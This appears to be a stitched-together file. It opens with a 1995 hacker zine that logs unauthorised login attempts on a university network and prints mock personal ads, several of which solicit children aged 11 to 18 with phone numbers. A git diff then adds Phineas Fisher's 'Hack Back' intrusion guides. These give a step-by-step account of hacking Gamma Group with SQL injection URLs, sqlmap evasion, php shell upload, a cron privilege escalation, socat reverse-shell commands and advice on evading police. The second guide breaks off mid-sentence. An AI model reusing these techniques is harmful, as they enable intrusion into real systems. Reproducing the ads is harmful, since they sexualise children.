+2400 - (215)204-9630 +9600 - (215)204-9638 +14400 - (215)204-2800 + +So what the hell do I get? + +The following is a log of my activites... +Pardon my stuoidyt I'm not familiar with the system... +It is short but to me it looks like you could have a LOTTA fun ! + +CONNECT 14400/ARQ +C + + +Welcome to TempleNet - Temple University's Ethernet network + +Enter a Command followed by [Return] or [Enter]. + + Command: Description: + telnet astro Astro Unix system + tn3270 ibm IBM mainframe + telnet library Temple's library catalog + +For HELP, call the Network HOTLINE at 204-6529. + +**Dialin for up to 2400 bps: 204-9630 thru 9634 (40 ports to WiseOwl) +**Dialin for up to 9600 bps: 204-9638 (7 ports to WiseOwl) +**Dialin for up to 14400 bps: 204-2800 (64 ports to TempleNet) + +This system is restricted to authorized Temple University users and is +subject to audit. The unauthorized access, use, or modification of any +network component is a criminal violation of federal and state laws. (4) + + + + +TempleNet>telnet ibm +Trying IBM (155.247.14.2)... Open + . + +.exit + +HCPCFC015E Command not valid before LOGON: EXIT + +Enter one of the following commands: + + LOGON userid (Example: LOGON VMUSER1) + LOGOFF +.logon vmuser1 + +HCPLGA053E VMUSER1 not in CP directory + +Enter one of the following commands: + + LOGON userid (Example: LOGON VMUSER1) + LOGOFF +.logoff + +LOGOFF AT 22:27:26 EDT FRIDAY 06/09/95 + +[Connection to IBM closed by foreign host] +TempleNet> + +TempleNet>? + +connect Connect to host - same as typing just a host name +disconnect Break the connection specified by name or number +exit, quit, logout Exit from the EXEC +lat Connect to service using DEC LAT protocol +lock Lock the terminal +name-connection Give a connection a logical name +resume Make the named connection be current +rlogin Connect to host using rlogin protocol +show Information commands, type "show ?" for list +slip Enter SLIP mode +systat Show terminal lines and users +telnet Connect to host using telnet protocol +tn3270 Connect to host using telnet protocol (3270) +terminal Change terminal's parameters, type "terminal ?" +where Show open connections +xremote Enter XRemote mode + To resume connection + +TempleNet> + +TempleNet>telnet astro +Trying ASTRO (155.247.165.100)... Open + + +EP/IX (astro) + +login: user1 +Password: +UX:login: ERROR: Login incorrect + +NO CARRIER + +Now remember ... :-) +This system is restricted to authorized Temple University users and is +subject to audit. The unauthorized access, use, or modification of any +network component is a criminal violation of federal and state laws. (4) + +Have fun with it!(Oh by the way I dialed the number by "accident" Hehehe) + +-Sarlo 10/13/95 [L0CK] + + +------------------------------------------------------------------------------ + LETTERS TO [L0CK] +Dear [L0CK], + I have been dating my boyfreind for almost 2 years and i thought i really + loved him. But a few months ago i met another guy who is absolutely + adoreable and lots of fun to be with. I feel guilty and miserable when + I'm with this other man. What sould I do, [L0CK]? + - Torn Between Two Lovers + +Dear Torn, + Ah the classic love triangle. The situation is really not fair to anyone, + but the longer you stay in it the stickier it will get.[teehee] Get your + long-term relationship out in the open. Whatever you decide to do, do it + fast and gently! + - blewt [L0CK] +****************************************************************************** +ATTENTION: WE DECIDED TO ADD A NEW SECTION TO THE [L0CK] GNUZLETTER: THIS IS +IN LARGE PART DUE TO LOTS OF MEN WRITTING ME AND ASKING ME TO PRINT THEIR +PERSONALS. I HAD MY DOUBTS ABOUT IT, BUT SINCE MANY MEN HAVE NOT FOUND TRUE +LOVE LIKE I HAVE WITH MY BROTHERS, I FELT PITY FOR THEM. JUST LIKE BATMAN +AND ROBIN, WALLY AND THE BEAVER, SKIPPER AND GILLIGAN, MINOR THREAT AND +MUCHO MAAS THEY CAN FIND TRUE BROTHERLY HAPPINESS. - MAX-Q +***************************************************************************** + | + COCK-A-DOODLE-DOO | JOIN IN OUR PAGAN MEETINGS + | + Pre-Op Transexual Marine looking | A Bi-Weekly Discussion of Life + for boys who like red bottoms and | and Homosexuality. Call and be + propper punishment. | involved. 703-360-8427 + | +--------------------------------------+--------------------------------------- + | + ARE YOU AFRAID OF THE DARK | ORAL ATHLETIC AND FLEXIBLE + | + Confused About Relationships and | Seeking Discreet Dominant Male + tired of being hassled by nosey | for sensual stimulation and some + Investigators from the Child Welfare | Phantastic times. You Know what + Agencey? We Can Help. Discreet. | You want! Come and Get it! + | +--------------------------------------+--------------------------------------- + | + YOU KNOW THE CONSEQUENCES | YOUR SPECIAL AD + | + Help Me Seize Young Offenders and | COULD BE RIGHT HERE #@! + their Equipment. I'll Show You an | + Interjudicial Proceeding that will | SEND ELECTRONIC MAIL TO: + Change Your Lifestyle! | MAX-Q@2600.COM + | +--------------------------------------+--------------------------------------- + | + ARE YOU 11 OR 12 ??? | Str41Gh+ Act1nG M4l3 (El1t3) + | + Looking for men 11 - 12 for adult | L00k1ng F0r MasCul1n3 Sh0rt GuY + video satisfaction. I am 35 into | f0R s4fe T1m3s. I w4n+ t0 B3 + Professional wrestling. | Tr34t3d Juzt L1k3 a L1tTle g1rL. + Let's talk soon : 505-984-8800 | d0 m3 n0w!! : 516-T0o-kRAd + | +--------------------------------------+--------------------------------------- + | + LET'S BE FREE | MUCH OLDER GENTLEMAN + | + Gay White Male 38, 5'11" looking | Looking For Asian Boy 12 - 18 + for men, 12 - 32 clean, fit, and | who is petite. Someone to go + hairy. Discreet Encounters. | out with. Very Discreet. + Call Anytime : 516-751-2600 | Call Tonight! 011-61-2-368-0041 + | +--------------------------------------+--------------------------------------- + +"The Warrior's Prayer," by blewt [L0CK] + +To my ancestors, whom I shall leave anonymous, and my man, max-q: + +I leave this day for battle. +I know not whom I fight. +The victory is not certain. +For our enemies are strong. + +I carry myself with courage. +Though I quake with fear. +I fight them all with honor. +For I have my brothers near. + +Oh ye I pray to thee, +Those who came before, +For the strength of heart I need... +Just to lift this keyboard. + +I know I seem the coward, +Standing on the snow. +I no longer wear my armor. +I have lost my will to love. + +What can I do with this life, +O ye in the beyond? +How can I look the others in the face, +Now that my will to love is gone? + +So to thee I say my final goodbye, +And a hardy forget-me-not. +For I'll always have my brothers, +And together we are [L0CK]. + + - blewt - 1995 + + diff --git a/PhineasFisher/1.txt b/PhineasFisher/1.txt new file mode 100755 index 0000000..a357861 --- /dev/null +++ b/PhineasFisher/1.txt @@ -0,0 +1,407 @@ + _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) + + A DIY Guide for those without the patience to wait for whistleblowers + + +--[ 1 ]-- Introduction + +I'm not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz +it took to 0wn Gamma. I'm writing this to demystify hacking, to show how simple +it is, and to hopefully inform and inspire you to go out and hack shit. If you +have no experience with programming or hacking, some of the text below might +look like a foreign language. Check the resources section at the end to help you +get started. And trust me, once you've learned the basics you'll realize this +really is easier than filing a FOIA request. + + +--[ 2 ]-- Staying Safe + +This is illegal, so you'll need to take same basic precautions: + +1) Make a hidden encrypted volume with Truecrypt 7.1a [0] +2) Inside the encrypted volume install Whonix [1] +3) (Optional) While just having everything go over Tor thanks to Whonix is + probably sufficient, it's better to not use an internet connection connected + to your name or address. A cantenna, aircrack, and reaver can come in handy + here. + +[0] https://truecrypt.ch/downloads/ +[1] https://www.whonix.org/wiki/Download#Install_Whonix + +As long as you follow common sense like never do anything hacking related +outside of Whonix, never do any of your normal computer usage inside Whonix, +never mention any information about your real life when talking with other +hackers, and never brag about your illegal hacking exploits to friends in real +life, then you can pretty much do whatever you want with no fear of being v&. + +NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable +for some things like web browsing, when it comes to using hacking tools like +nmap, sqlmap, and nikto that are making thousands of requests, they will run +very slowly over Tor. Not to mention that you'll want a public IP address to +receive connect back shells. I recommend using servers you've hacked or a VPS +paid with bitcoin to hack from. That way only the low bandwidth text interface +between you and the server is over Tor. All the commands you're running will +have a nice fast connection to your target. + + +--[ 3 ]-- Mapping out the target + +Basically I just repeatedly use fierce [0], whois lookups on IP addresses and +domain names, and reverse whois lookups to find all IP address space and domain +names associated with an organization. + +[0] http://ha.ckers.org/fierce/ + +For an example let's take Blackwater. We start out knowing their homepage is at +academi.com. Running fierce.pl -dns academi.com we find the subdomains: +67.238.84.228 email.academi.com +67.238.84.242 extranet.academi.com +67.238.84.240 mail.academi.com +67.238.84.230 secure.academi.com +67.238.84.227 vault.academi.com +54.243.51.249 www.academi.com + +Now we do whois lookups and find the homepage of www.academi.com is hosted on +Amazon Web Service, while the other IPs are in the range: +NetRange: 67.238.84.224 - 67.238.84.255 +CIDR: 67.238.84.224/27 +CustName: Blackwater USA +Address: 850 Puddin Ridge Rd + +Doing a whois lookup on academi.com reveals it's also registered to the same +address, so we'll use that as a string to search with for the reverse whois +lookups. As far as I know all the actual reverse whois lookup services cost +money, so I just cheat with google: +"850 Puddin Ridge Rd" inurl:ip-address-lookup +"850 Puddin Ridge Rd" inurl:domaintools + +Now run fierce.pl -range on the IP ranges you find to lookup dns names, and +fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more +whois lookups and repeat the process until you've found everything. + +Also just google the organization and browse around its websites. For example on +academi.com we find links to a careers portal, an online store, and an employee +resources page, so now we have some more: +54.236.143.203 careers.academi.com +67.132.195.12 academiproshop.com +67.238.84.236 te.academi.com +67.238.84.238 property.academi.com +67.238.84.241 teams.academi.com + +If you repeat the whois lookups and such you'll find academiproshop.com seems to +not be hosted or maintained by Blackwater, so scratch that off the list of +interesting IPs/domains. + +In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com +was simply a whois lookup of finfisher.com which found it registered to the name +"FinFisher GmbH". Googling for: +"FinFisher GmbH" inurl:domaintools +finds gamma-international.de, which redirects to finsupport.finfisher.com + +...so now you've got some idea how I map out a target. +This is actually one of the most important parts, as the larger the attack +surface that you are able to map out, the easier it will be to find a hole +somewhere in it. + + +--[ 4 ]-- Scanning & Exploiting + +Scan all the IP ranges you found with nmap to find all services running. Aside +from a standard port scan, scanning for SNMP is underrated. + +Now for each service you find running: + +1) Is it exposing something it shouldn't? Sometimes companies will have services +running that require no authentication and just assume it's safe because the url +or IP to access it isn't public. Maybe fierce found a git subdomain and you can +go to git.companyname.come/gitweb/ and browse their source code. + +2) Is it horribly misconfigured? Maybe they have an ftp server that allows +anonymous read or write access to an important directory. Maybe they have a +database server with a blank admin password (lol stratfor). Maybe their embedded +devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer's +default password. + +3) Is it running an old version of software vulnerable to a public exploit? + + +Webservers deserve their own category. For any webservers, including ones nmap +will often find running on nonstandard ports, I usually: + +1) Browse them. Especially on subdomains that fierce finds which aren't intended +for public viewing like test.company.com or dev.company.com you'll often find +interesting stuff just by looking at them. + +2) Run nikto [0]. This will check for things like webserver/.svn/, +webserver/backup/, webserver/phpinfo.php, and a few thousand other common +mistakes and misconfigurations. + +3) Identify what software is being used on the website. WhatWeb is useful [1] + +4) Depending on what software the website is running, use more specific tools +like wpscan [2], CMS-Explorer [3], and Joomscan [4]. + +First try that against all services to see if any have a misconfiguration, +publicly known vulnerability, or other easy way in. If not, it's time to move +on to finding a new vulnerability: + +5) Custom coded web apps are more fertile ground for bugs than large widely used +projects, so try those first. I use ZAP [5], and some combination of its +automated tests along with manually poking around with the help of its +intercepting proxy. + +6) For the non-custom software they're running, get a copy to look at. If it's +free software you can just download it. If it's proprietary you can usually +pirate it. If it's proprietary and obscure enough that you can't pirate it you +can buy it (lame) or find other sites running the same software using google, +find one that's easier to hack, and get a copy from them. + +[0] http://www.cirt.net/nikto2 +[1] http://www.morningstarsecurity.com/research/whatweb +[2] http://wpscan.org/ +[3] https://code.google.com/p/cms-explorer/ +[4] http://sourceforge.net/projects/joomscan/ +[5] https://code.google.com/p/zaproxy/ + + +For finsupport.finfisher.com the process was: + +* Start nikto running in the background. + +* Visit the website. See nothing but a login page. Quickly check for sqli in the + login form. + +* See if WhatWeb knows anything about what software the site is running. + +* WhatWeb doesn't recognize it, so the next question I want answered is if this + is a custom website by Gamma, or if there are other websites using the same + software. + +* I view the page source to find a URL I can search on (index.php isn't + exactly unique to this software). I pick Scripts/scripts.js.php, and google: + allinurl:"Scripts/scripts.js.php" + +* I find there's a handful of other sites using the same software, all coded by + the same small webdesign firm. It looks like each site is custom coded but + they share a lot of code. So I hack a couple of them to get a collection of + code written by the webdesign firm. + +At this point I can see the news stories that journalists will write to drum +up views: "In a sophisticated, multi-step attack, hackers first compromised a +web design firm in order to acquire confidential data that would aid them in +attacking Gamma Group..." + +But it's really quite easy, done almost on autopilot once you get the hang of +it. It took all of a couple minutes to: + +* google allinurl:"Scripts/scripts.js.php" and find the other sites + +* Notice they're all sql injectable in the first url parameter I try. + +* Realize they're running Apache ModSecurity so I need to use sqlmap [0] with + the option --tamper='tamper/modsecurityversioned.py' + +* Acquire the admin login information, login and upload a php shell [1] (the + check for allowable file extensions was done client side in javascript), and + download the website's source code. + +[0] http://sqlmap.org/ +[1] https://epinna.github.io/Weevely/ + +Looking through the source code they might as well have named it Damn Vulnerable +Web App v2 [0]. It's got sqli, LFI, file upload checks done client side in +javascript, and if you're unauthenticated the admin page just sends you back to +the login page with a Location header, but you can have your intercepting proxy +filter the Location header out and access it just fine. + +[0] http://www.dvwa.co.uk/ + +Heading back over to the finsupport site, the admin /BackOffice/ page returns +403 Forbidden, and I'm having some issues with the LFI, so I switch to using the +sqli (it's nice to have a dozen options to choose from). The other sites by the +web designer all had an injectable print.php, so some quick requests to: +https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 +https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1 +reveal that finsupport also has print.php and it is injectable. And it's +database admin! For MySQL this means you can read and write files. It turns out +the site has magicquotes enabled, so I can't use INTO OUTFILE to write files. +But I can use a short script that uses sqlmap --file-read to get the php source +for a URL, and a normal web request to get the HTML, and then finds files +included or required in the php source, and finds php files linked in the HTML, +to recursively download the source to the whole site. + +Looking through the source, I see customers can attach a file to their support +tickets, and there's no check on the file extension. So I pick a username and +password out of the customer database, create a support request with a php shell +attached, and I'm in! + + +--[ 5 ]-- (fail at) Escalating + + ___________ +< got r00t? > + ----------- + \ ^__^ + \ (oo)\_______ + (__)\ )\/\ + ||----w | + || || + ^^^^^^^^^^^^^^^^ + +Root over 50% of linux servers you encounter in the wild with two easy scripts, +Linux_Exploit_Suggester [0], and unix-privesc-check [1]. + +[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester +[1] https://code.google.com/p/unix-privesc-check/ + +finsupport was running the latest version of Debian with no local root exploits, +but unix-privesc-check returned: +WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user +www-data can write to /etc/cron.hourly/mgmtlicensestatus +WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data +can write to /etc/cron.hourly/webalizer + +so I add to /etc/cron.hourly/webalizer: +chown root:root /path/to/my_setuid_shell +chmod 04755 /path/to/my_setuid_shell + +wait an hour, and ....nothing. Turns out that while the cron process is running +it doesn't seem to be actually running cron jobs. Looking in the webalizer +directory shows it didn't update stats the previous month. Apparently after +updating the timezone cron will sometimes run at the wrong time or sometimes not +run at all and you need to restart cron after changing the timezone. ls -l +/etc/localtime shows the timezone got updated June 6, the same time webalizer +stopped recording stats, so that's probably the issue. At any rate, the only +thing this server does is host the website, so I already have access to +everything interesting on it. Root wouldn't get much of anything new, so I move +on to the rest of the network. + + +--[ 6 ]-- Pivoting + +The next step is to look around the local network of the box you hacked. This +is pretty much the same as the first Scanning & Exploiting step, except that +from behind the firewall many more interesting services will be exposed. A +tarball containing a statically linked copy of nmap and all its scripts that you +can upload and run on any box is very useful for this. The various nfs-* and +especially smb-* scripts nmap has will be extremely useful. + +The only interesting thing I could get on finsupport's local network was another +webserver serving up a folder called 'qateam' containing their mobile malware. + + +--[ 7 ]-- Have Fun + +Once you're in their networks, the real fun starts. Just use your imagination. +While I titled this a guide for wannabe whistleblowers, there's no reason to +limit yourself to leaking documents. My original plan was to: +1) Hack Gamma and obtain a copy of the FinSpy server software +2) Find vulnerabilities in FinSpy server. +3) Scan the internet for, and hack, all FinSpy C&C servers. +4) Identify the groups running them. +5) Use the C&C server to upload and run a program on all targets telling them + who was spying on them. +6) Use the C&C server to uninstall FinFisher on all targets. +7) Join the former C&C servers into a botnet to DDoS Gamma Group. + +It was only after failing to fully hack Gamma and ending up with some +interesting documents but no copy of the FinSpy server software that I had to +make due with the far less lulzy backup plan of leaking their stuff while +mocking them on twitter. +Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password +already so I can move on to step 2! + + +--[ 8 ]-- Other Methods + +The general method I outlined above of scan, find vulnerabilities, and exploit +is just one way to hack, probably better suited to those with a background in +programming. There's no one right way, and any method that works is as good as +any other. The other main ways that I'll state without going into detail are: + +1) Exploits in web browers, java, flash, or microsoft office, combined with +emailing employees with a convincing message to get them to open the link or +attachment, or hacking a web site frequented by the employees and adding the +browser/java/flash exploit to that. +This is the method used by most of the government hacking groups, but you don't +need to be a government with millions to spend on 0day research or subscriptions +to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit +for a couple thousand, and rent access to one for much less. There's also +metasploit browser autopwn, but you'll probably have better luck with no +exploits and a fake flash updater prompt. + +2) Taking advantage of the fact that people are nice, trusting, and helpful 95% +of the time. +The infosec industry invented a term to make this sound like some sort of +science: "Social Engineering". This is probably the way to go if you don't know +too much about computers, and it really is all it takes to be a successful +hacker [0]. + +[0] https://www.youtube.com/watch?v=DB6ywr9fngU + + +--[ 9 ]-- Resources + +Links: + +* https://www.pentesterlab.com/exercises/ +* http://overthewire.org/wargames/ +* http://www.hackthissite.org/ +* http://smashthestack.org/ +* http://www.win.tue.nl/~aeb/linux/hh/hh.html +* http://www.phrack.com/ +* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot +* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash +* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ +* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers + (all his other blog posts are great too) +* https://www.corelan.be/ (start at Exploit writing tutorial part 1) +* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ + One trick it leaves out is that on most systems the apache access log is + readable only by root, but you can still include from /proc/self/fd/10 or + whatever fd apache opened it as. It would also be more useful if it mentioned + what versions of php the various tricks were fixed in. +* http://www.dest-unreach.org/socat/ + Get usable reverse shells with a statically linked copy of socat to drop on + your target and: + target$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM + host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM + It's also useful for setting up weird pivots and all kinds of other stuff. + +Books: + +* The Web Application Hacker's Handbook +* Hacking: The Art of Exploitation +* The Database Hacker's Handbook +* The Art of Software Security Assessment +* A Bug Hunter's Diary +* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier +* TCP/IP Illustrated + +Aside from the hacking specific stuff almost anything useful to a system +administrator for setting up and administering networks will also be useful for +exploring them. This includes familiarity with the windows command prompt and unix +shell, basic scripting skills, knowledge of ldap, kerberos, active directory, +networking, etc. + + +--[ 10 ]-- Outro + +You'll notice some of this sounds exactly like what Gamma is doing. Hacking is a +tool. It's not selling hacking tools that makes Gamma evil. It's who their +customers are targeting and with what purpose that makes them evil. That's not +to say that tools are inherently neutral. Hacking is an offensive tool. In the +same way that guerrilla warfare makes it harder to occupy a country, whenever +it's cheaper to attack than to defend it's harder to maintain illegitimate +authority and inequality. So I wrote this to try to make hacking easier and more +accessible. And I wanted to show that the Gamma Group hack really was nothing +fancy, just standard sqli, and that you do have the ability to go out and take +similar action. + +Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea +Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned +hackers, dissidents, and criminals! \ No newline at end of file diff --git a/PhineasFisher/2.txt b/PhineasFisher/2.txt new file mode 100755 index 0000000..6918a58 --- /dev/null +++ b/PhineasFisher/2.txt @@ -0,0 +1,925 @@ + _ _ _ ____ _ _ + | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | + | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | + | _ | (_| | (__| < | |_) | (_| | (__| <|_| + |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) + + A DIY Guide + + + + ,-._,-._ + _,-\ o O_/; + / , ` `| + | \-.,___, / ` + \ `-.__/ / ,.\ + / `-.__.-\` ./ \' + / /| ___\ ,/ `\ + ( ( |.-"` '/\ \ ` + \ \/ ,, | \ _ + \| o/o / \. + \ , / / + ( __`;-;'__`) \\ + `//'` `||` `\ + _// || __ _ _ _____ __ + .-"-._,(__) .(__).-""-. | | | | |_ _| | + / \ / \ | | |_| | | | | + \ / \ / | | _ | | | | + `'-------` `--------'` __| |_| |_| |_| |__ + #antisec + + + +--[ 1 - Introduction ]---------------------------------------------------------- + +You'll notice the change in language since the last edition [1]. The +English-speaking world already has tons of books, talks, guides, and +info about hacking. In that world, there's plenty of hackers better than me, +but they misuse their talents working for "defense" contractors, for intelligence +agencies, to protect banks and corporations, and to defend the status quo. +Hacker culture was born in the US as a counterculture, but that origin only +remains in its aesthetics - the rest has been assimilated. At least they can +wear a t-shirt, dye their hair blue, use their hacker names, and feel like +rebels while they work for the Man. + +You used to have to sneak into offices to leak documents [2]. You used to need +a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4]. +Like the CNT said after the Gamma Group hack: "Let's take a step forward with +new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight! + +[1] http://pastebin.com/raw.php?i=cRYvK4jb +[2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI +[3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html +[4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf +[5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group + + +--[ 2 - Hacking Team ]---------------------------------------------------------- + +Hacking Team was a company that helped governments hack and spy on +journalists, activists, political opposition, and other threats to their power +[1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals +and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the +fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende +RCS". They also claimed to have technology to solve the "problem" posed by Tor +and the darknet [13]. But seeing as I'm still free, I have my doubts about +its effectiveness. + +[1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/ +[2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html +[3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/ +[4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/ +[5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/ +[6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/ +[7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/ +[8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal +[9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/ +[10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/ +[11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/ +[12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html +[13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web + + +--[ 3 - Stay safe out there ]--------------------------------------------------- + +Unfortunately, our world is backwards. You get rich by doing bad things and go +to jail for doing good. Fortunately, thanks to the hard work of people like +the Tor project [1], you can avoid going to jail by taking a few simple +precautions: + +1) Encrypt your hard disk [2] + + I guess when the police arrive to seize your computer, it means you've + already made a lot of mistakes, but it's better to be safe. + +2) Use a virtual machine with all traffic routed through Tor + + This accomplishes two things. First, all your traffic is anonymized through + Tor. Second, keeping your personal life and your hacking on separate + computers helps you not to mix them by accident. + + You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or + something custom [6]. Here's [7] a detailed comparison. + +3) (Optional) Don't connect directly to Tor + + Tor isn't a panacea. They can correlate the times you're connected to Tor + with the times your hacker handle is active. Also, there have been + successful attacks against Tor [8]. You can connect to Tor using other + peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for + cracking wifi. Another option is to connect to a VPN or a bridge node [10] + before Tor, but that's less secure because they can still correlate the + hacker's activity with your house's internet activity (this was used as + evidence against Jeremy Hammond [11]). + + The reality is that while Tor isn't perfect, it works quite well. When I + was young and reckless, I did plenty of stuff without any protection (I'm + referring to hacking) apart from Tor, that the police tried their hardest + to investigate, and I've never had any problems. + +[1] https://www.torproject.org/ +[2] https://info.securityinabox.org/es/chapter-4 +[3] https://www.whonix.org/ +[4] https://tails.boum.org/ +[5] https://www.qubes-os.org/doc/privacy/torvm/ +[6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy +[7] https://www.whonix.org/wiki/Comparison_with_Others +[8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/ +[9] http://www.wifislax.com/ +[10] https://www.torproject.org/docs/bridges.html.en +[11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html + + +----[ 3.1 - Infrastructure ]---------------------------------------------------- + +I don't hack directly from Tor exit nodes. They're on blacklists, they're +slow, and they can't receive connect-backs. Tor protects my anonymity while I +connect to the infrastructure I use to hack, which consists of: + +1) Domain Names + + For C&C addresses, and for DNS tunnels for guaranteed egress. + +2) Stable Servers + + For use as C&C servers, to receive connect-back shells, to launch attacks, + and to store the loot. + +3) Hacked Servers + + For use as pivots to hide the IP addresses of the stable servers. And for + when I want a fast connection without pivoting, for example to scan ports, + scan the whole internet, download a database with sqli, etc. + +Obviously, you have to use an anonymous payment method, like bitcoin (if it's +used carefully). + + +----[ 3.2 - Attribution ]------------------------------------------------------- + +In the news we often see attacks traced back to government-backed hacking +groups ("APTs"), because they repeatedly use the same tools, leave the same +footprints, and even use the same infrastructure (domains, emails, etc). +They're negligent because they can hack without legal consequences. + +I didn't want to make the police's work any easier by relating my hack of +Hacking Team with other hacks I've done or with names I use in my day-to-day +work as a blackhat hacker. So, I used new servers and domain names, registered +with new emails, and payed for with new bitcoin addresses. Also, I only used +tools that are publicly available, or things that I wrote specifically for +this attack, and I changed my way of doing some things to not leave my usual +forensic footprint. + + +--[ 4 - Information Gathering ]------------------------------------------------- + +Although it can be tedious, this stage is very important, since the larger the +attack surface, the easier it is to find a hole somewhere in it. + + +----[ 4.1 - Technical Information ]--------------------------------------------- + +Some tools and techniques are: + +1) Google + + A lot of interesting things can be found with a few well-chosen search + queries. For example, the identity of DPR [1]. The bible of Google hacking + is the book "Google Hacking for Penetration Testers". You can find a short + summary in Spanish at [2]. + +2) Subdomain Enumeration + + Often, a company's main website is hosted by a third party, and you'll find + the company's actual IP range thanks to subdomains like mx.company.com or + ns1.company.com. Also, sometimes there are things that shouldn't be exposed + in "hidden" subdomains. Useful tools for discovering domains and subdomains + are fierce [3], theHarvester [4], and recon-ng [5]. + +3) Whois lookups and reverse lookups + + With a reverse lookup using the whois information from a domain or IP range + of a company, you can find other domains and IP ranges. As far as I know, + there's no free way to do reverse lookups aside from a google "hack": + + "via della moscova 13" site:www.findip-address.com + "via della moscova 13" site:domaintools.com + +4) Port scanning and fingerprinting + + Unlike the other techniques, this talks to the company's servers. I + include it in this section because it's not an attack, it's just + information gathering. The company's IDS might generate an alert, but you + don't have to worry since the whole internet is being scanned constantly. + + For scanning, nmap [6] is precise, and can fingerprint the majority of + services discovered. For companies with very large IP ranges, zmap [7] or + masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web + sites. + +[1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html +[2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf +[3] http://ha.ckers.org/fierce/ +[4] https://github.com/laramies/theHarvester +[5] https://bitbucket.org/LaNMaSteR53/recon-ng +[6] https://nmap.org/ +[7] https://zmap.io/ +[8] https://github.com/robertdavidgraham/masscan +[9] http://www.morningstarsecurity.com/research/whatweb +[10] http://blindelephant.sourceforge.net/ + + +----[ 4.2 - Social Information ]------------------------------------------------ + +For social engineering, it's useful to have information about the employees, +their roles, contact information, operating system, browser, plugins, +software, etc. Some resources are: + +1) Google + + Here as well, it's the most useful tool. + +2) theHarvester and recon-ng + + I already mentioned them in the previous section, but they have a lot more + functionality. They can find a lot of information quickly and + automatically. It's worth reading all their documentation. + +3) LinkedIn + + A lot of information about the employees can be found here. The company's + recruiters are the most likely to accept your connection requests. + +4) Data.com + + Previously known as jigsaw. They have contact information for many + employees. + +5) File Metadata + + A lot of information about employees and their systems can be found in + metadata of files the company has published. Useful tools for finding + files on the company's website and extracting the metadata are metagoofil + [1] and FOCA [2]. + +[1] https://github.com/laramies/metagoofil +[2] https://www.elevenpaths.com/es/labstools/foca-2/index.html + + +--[ 5 - Entering the network ]-------------------------------------------------- + +There are various ways to get a foothold. Since the method I used against +Hacking Team is uncommon and a lot more work than is usually necessary, I'll +talk a little about the two most common ways, which I recommend trying first. + + +----[ 5.1 - Social Engineering ]------------------------------------------------ + +Social engineering, specifically spear phishing, is responsible for the +majority of hacks these days. For an introduction in Spanish, see [1]. For +more information in English, see [2] (the third part, "Targeted Attacks"). For +fun stories about the social engineering exploits of past generations, see +[3]. I didn't want to try to spear phish Hacking Team, as their whole business +is helping governments spear phish their opponents, so they'd be much more +likely to recognize and investigate a spear phishing attempt. + +[1] 